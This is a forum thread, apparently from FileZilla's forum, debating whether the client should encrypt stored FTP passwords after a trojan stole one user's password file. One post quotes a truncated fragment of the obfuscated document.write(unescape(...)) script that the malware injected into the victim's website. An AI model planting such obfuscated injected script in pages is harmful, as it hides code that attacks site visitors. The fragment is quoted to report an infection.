Password file has been hacked and used by a virus

[botg]

Also, I am unsure how on earth did the viral jerks nest inside of my PC

Most likely some vulnerability in some program you're using. Common culprits, often with known unpatched vulnerabilities: Windows, Internet Explorer, all Adobe Software (Acrobad, Flash), Windows Media Player, other media players, even virus scanners and firewalls.

You should spend an hour every day to keep your system fully up-to-date, it's a very time consuming task on Windows, no central update functionality. There exist some special tools for Windows to check all installed programs but I do not know how reliable those are.

[Echo]

Hello,
I've just signed up to ask the same question : "Is it possible to add an encrypted managed sites / passwords like most of other FTP clients ?" and I find this post.. ^^

I think even you have an updated system, it can take time to patch some applications, even popular ones. Finally you may have the need of FTP : from an unknown or a shared computer at work, at university, at a customer office etc. I think if some other popular applications created passwords encryption like Firefox, it's because it's useful for many people.
Regards

[boco]

Filezilla should switch to biometric data.

Malware waits till you enter your blood and stool samples and makes a copy of the data, able replay it at will to perform its malicious tasks.


Edit: Hey I didn't say this! botg did you h4xx0r my post?

[alphonse777]

Hi all,
Trojan.Silentbanker (or equivalent) had stolen the filezilla XML password file, while my PC was on.
Why would no crypt the password file with a user password and 1024bit key ??
Event if the Trojan gets the file, the files is crypted... and brute force would not help a lot to retrieve the passwords...

Al.

[botg]

Trojan would simply wait till you use FileZilla and then access the decrypted passwords.

How did you get the malware in the first place? Do you open all executables sent to you by mail?

[alphonse777]

How did you get the malware in the first place? Do you open all executables sent to you by mail?

No I'm not so silly...
It used a vulnerability with acrobat reader thru internet explorer...

I have updated everything to the latest release...
I have spotted the malware thru tools/and regedit, I think I have killed it...
It took my password, and inserted into my website html file a Javascript contening something like

<script language=javascript><!--
document.write(unescape('pZ%3CscPrdri07pdSVtgc%20lOTsrc%3D

Something the user does not see...
Very bad !

Al.

[djgblz]

There is certainly an attitude of - You don't know what you are doing, so of course you got hacked. We must remember that not all users are as savvy as some of us, and that some are not fortunate enough to know everything about security before something like this happens. While security and operating systems are very important issues, sometimes changing your OS is just not in the cards. Please respect that in your replies.

It would be great if FileZilla would have encryption enabled by default to prevent ALL of the passwords stored in it from being stolen at once. That way it would give more time for the user, the Antivirus, and the OS developers to respond to a threat before all of FileZilla's Site Manager entries are compromised. Yes, it is understood that something could grab login info transmitted in the open, but at least it wouldn't be the entire catalog of Site Manager entries.

[botg]

It would be great if FileZilla would have encryption enabled by default to prevent ALL of the passwords stored in it from being stolen at once. That way it would give more time for the user, the Antivirus, and the OS developers to respond to a threat before all of FileZilla's Site Manager entries are compromised. Yes, it is understood that something could grab login info transmitted in the open, but at least it wouldn't be the entire catalog of Site Manager entries.

To do that, every single saved entry would need to be encrypted with a different key/password/passphrase. If you do that, you can just as well not store passwords at all and always entire it when you connect.

[djgblz]

To do that, every single saved entry would need to be encrypted with a different key/password/passphrase. If you do that, you can just as well not store passwords at all and always entire it when you connect.

Really? So you're saying there is no way FileZilla could keep an encrypted DB and keep the encrypting/decrypting transparent (within the program) before any passwords were transmitted over a connection (which is where the malware would be listening)?

Just curious if you know, but how do other FTP programs do it? Why are other forums saying that this is a problem for FTP programs like FileZilla that don't encrypt their databases.

I want to see FileZilla go as far as it can, but this seems to be a serious obstacle in terms of using this program for anything more than a hobby...

[botg]

How is not the problem, in fact that's trivial. The issue at hand is why do it at all if it doesn't offer any additional protection?

[jdratlif]

How is not the problem, in fact that's trivial. The issue at hand is why do it at all if it doesn't offer any additional protection?

Yes. That's why I don't lock my doors at night. If someone wanted to break in, they'd wait to see me open them and then point a gun at me. There is no way to prevent a forceful attack, so why do anything when it's not guaranteed to protect me from a determined felon?

[botg]

Your analogy is flawed. A regular robber is opaque. Malware on the other hand is invisible. It's more like a tiny tiny spy x-ray camera you would not possibly find, but it's there and seeing everything you do.
You need to prevent it getting inside the house strong locks, bars before windows, leaded plating and so on. But as soon as it is in your house, it can see everything.

[jdratlif]

Locks can be picked, bars can be bent, broken, or cut. Leaded plating? Now you've joined me in the realm of the ridiculous. The point being, locking the door prevents opportunistic attackers.

Firefox has a password manager that you can guard with a master password. I wouldn't trust it if I worked at the DoD, but that's not my interest.

Just a thought.

[botg]

Getting past the door gives you full access to your computer.

[jdratlif]

Why do people use password protected RSA keys?